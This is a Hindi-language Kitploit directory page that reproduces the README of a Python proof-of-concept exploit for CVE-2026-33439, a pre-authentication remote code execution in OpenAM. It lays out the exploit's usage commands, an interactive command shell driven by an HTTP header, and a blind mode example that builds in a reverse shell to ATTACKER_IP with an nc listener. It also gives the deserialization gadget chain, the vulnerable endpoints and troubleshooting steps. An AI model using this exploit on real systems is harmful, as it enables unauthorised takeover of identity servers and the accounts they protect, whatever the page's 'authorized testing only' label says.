Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-33439-PoC — Python PoC जो CVE-2026-33439 का उपयोग करता है, जो OpenAM में jato.clientSession पैरामीटर के Java deserialization के माध्यम से एक pre-auth RCE है, जिसमें interactive और blind shell मोड हैं। | Kitploit
उपकरण/GitHubGitHub/jonaschen0103/cve-2026-33439-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूल
GitHubjonaschen0103/cve-2026-33439-poc

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

CVE-2026-33439-PoC

Python PoC जो CVE-2026-33439 का उपयोग करता है, जो OpenAM में jato.clientSession पैरामीटर के Java deserialization के माध्यम से एक pre-auth RCE है, जिसमें interactive और blind shell मोड हैं।

रिपॉजिटरी देखें
4घं 48मि पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2026-33439 — OpenAM प्री-ऑथ RCE

OpenIdentityPlatform OpenAM <= 16.0.5 में jato.clientSession पैरामीटर के असुरक्षित Java डीसेरियलाइज़ेशन के माध्यम से प्री-ऑथेंटिकेशन रिमोट कोड एक्ज़ीक्यूशन (CVSS 9.8)।

केवल अधिकृत सुरक्षा परीक्षण के लिए।

त्वरित शुरुआत

root@kitploit:~
# 1. Build payload (downloads JARs from Maven Central + compiles gadget chain)
python build.py

# 2. Exploit — interactive shell (output returned in HTTP response)
python exploit.py --url https://target/openam/ui/PWResetUserValidation --shell

आवश्यकताएँ

  • Python 3.10+ (केवल stdlib, कोई pip install नहीं)
  • JDK 21 (build.py के लिए — लक्ष्य सर्वर के JVM संस्करण से मेल खाना चाहिए; JDK 25 असंगत सीरियलाइज़्ड ऑब्जेक्ट उत्पन्न करता है)

दो मोड

इंटरैक्टिव मोड (डिफ़ॉल्ट) — HTTP प्रतिक्रिया में आउटपुट

EvilTranslet अनुरोध से cmd HTTP हेडर पढ़ता है, उसे निष्पादित करता है, और stdout को सीधे HTTP प्रतिक्रिया में लिखता है। किसी लिसनर की आवश्यकता नहीं।

root@kitploit:~
# Build interactive payload (no --command flag)
python build.py

# Single command
python exploit.py --url https://target/openam/ui/PWResetUserValidation "whoami"

# Interactive pseudo-shell
python exploit.py --url https://target/openam/ui/PWResetUserValidation --shell

# Auto-detect endpoint from base URL
python exploit.py --url https://target/openam/ --probe --shell

ब्लाइंड मोड — रिवर्स शेल / OOB के लिए

कमांड EvilTranslet बाइटकोड में बेक कर दिया जाता है। कोई आउटपुट वापस नहीं आता; कॉलबैक पकड़ने के लिए लिसनर (nc, आदि) का उपयोग करें।

root@kitploit:~
# Build blind payload with reverse shell command
python build.py --command "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

# Terminal 1: listener
nc -lvnp 4444

# Terminal 2: deliver to all JATO endpoints
python exploit.py --url https://target/openam/ --all

सभी विकल्प

build.py

फ़्लैगविवरण
(कोई फ़्लैग नहीं)इंटरैक्टिव पेलोड बनाएँ (रनटाइम पर cmd हेडर पढ़ता है)
--command "CMD"CMD को बाइटकोड में बेक करके ब्लाइंड पेलोड बनाएँ
--jars DIRडाउनलोड करने के बजाय स्थानीय JARs निर्देशिका का उपयोग करें (डिफ़ॉल्ट: ./libs)
--download-onlyकेवल JARs डाउनलोड करें, कंपाइल न करें

exploit.py

फ़्लैगविवरण
--url URLलक्ष्य URL (आवश्यक) — पूर्ण एंडपॉइंट या --probe/--all के साथ बेस URL
--shellइंटरैक्टिव स्यूडो-शेल (इंटरैक्टिव मोड)
--probeबेस URL से कमज़ोर एंडपॉइंट का स्वतः पता लगाएँ
--allसभी JATO एंडपॉइंट्स पर पेलोड पहुँचाएँ (ब्लाइंड मोड)
--method GET|POSTHTTP डिलीवरी विधि (डिफ़ॉल्ट: GET)
--proxy URLHTTP प्रॉक्सी (जैसे Burp के लिए http://127.0.0.1:8080)
--timeout SECSअनुरोध टाइमआउट (डिफ़ॉल्ट: 15)
--verify-tlsTLS प्रमाणपत्र सत्यापन सक्षम करें
--debugअनुरोध/प्रतिक्रिया विवरण दिखाएँ

पेलोड पारदर्शिता

सभी स्रोत कोड रेपो में हैं — कोई अपारदर्शी ब्लॉब नहीं। Java स्रोत build.py में पठनीय स्ट्रिंग स्थिरांक के रूप में एम्बेडेड हैं। बिल्ड के बाद, आउटपुट सत्यापित करें:

root@kitploit:~
python verify.py              # summary: classes, integrity, red-flag scan
python verify.py --strings    # all printable strings in the payload
python verify.py --hexdump    # full hex dump
python verify.py --dump p.bin # export raw bytes for SerializationDumper / javap

गैजेट चेन

root@kitploit:~
PriorityQueue.readObject()
  -> heapify() -> Column$ColumnComparator.compare()
    -> Column.getTable().isSortedAscending()
    -> Column.getProperty() -> PropertyUtils.getObjectPropertyValue()
      -> TemplatesImpl.getOutputProperties()
        -> defineTransletClasses() -> newInstance()
          -> EvilTranslet.<clinit>()  // command executes here

EvilTranslet (इंटरैक्टिव मोड)

  1. Thread.currentThread().getContextClassLoader().loadClass("com.iplanet.jato.RequestManager") — webapp क्लासलोडर के माध्यम से HTTP अनुरोध/प्रतिक्रिया प्राप्त करें
  2. request.getHeader("cmd") — कमांड पढ़ें
  3. new ProcessBuilder("/bin/sh", "-c", cmd) — निष्पादित करें
  4. response.reset() — किसी भी पूर्व JSP आउटपुट को साफ़ करें
  5. stdout को text/plain के रूप में प्रतिक्रिया में लिखें, फिर आउटपुट स्ट्रीम बंद करें

EvilTranslet (ब्लाइंड मोड)

  1. Runtime.getRuntime().exec(new String[]{"bash", "-c", "<baked-in command>"}) — फायर एंड फॉरगेट

कमज़ोर एंडपॉइंट्स

कोई भी JATO ViewBean एंडपॉइंट जो <jato:form> टैग रेंडर करता है, प्री-ऑथ में सुलभ:

एंडपॉइंटनोट्स
/openam/ui/PWResetUserValidationपासवर्ड रीसेट (सबसे विश्वसनीय)
/openam/ui/PWResetQuestionपासवर्ड रीसेट सुरक्षा प्रश्न
/openam/ui/Loginलॉगिन पेज

समस्या निवारण

लक्षणकारणसमाधान
कमांड आउटपुट के बजाय HTML पेज लौटाया गयाJSP प्रतिक्रिया को ओवरराइट करता हैइंटरैक्टिव पेलोड के साथ --shell का उपयोग करें; या ब्लाइंड मोड पर स्विच करें
डीसेरियलाइज़ेशन ट्रिगर नहीं होताJDK संस्करण बेमेलJDK 21 के साथ पुनर्निर्माण करें: export JAVA_HOME=/path/to/jdk-21
TLS हैंडशेक टाइमआउटसर्वर को SNI होस्टनाम की आवश्यकता है/etc/hosts में लक्ष्य जोड़ें और IP नहीं, होस्टनाम का उपयोग करें
javac नहीं मिलाJDK इंस्टॉल नहीं हैapt install openjdk-21-jdk

संदर्भ

  • NVD — CVE-2026-33439
  • OpenAM Advisory GHSA-2cqq-rpvq-g5qj
  • Broadcom Protection Bulletin

लाइसेंस

MIT

टूल डाउनलोड करें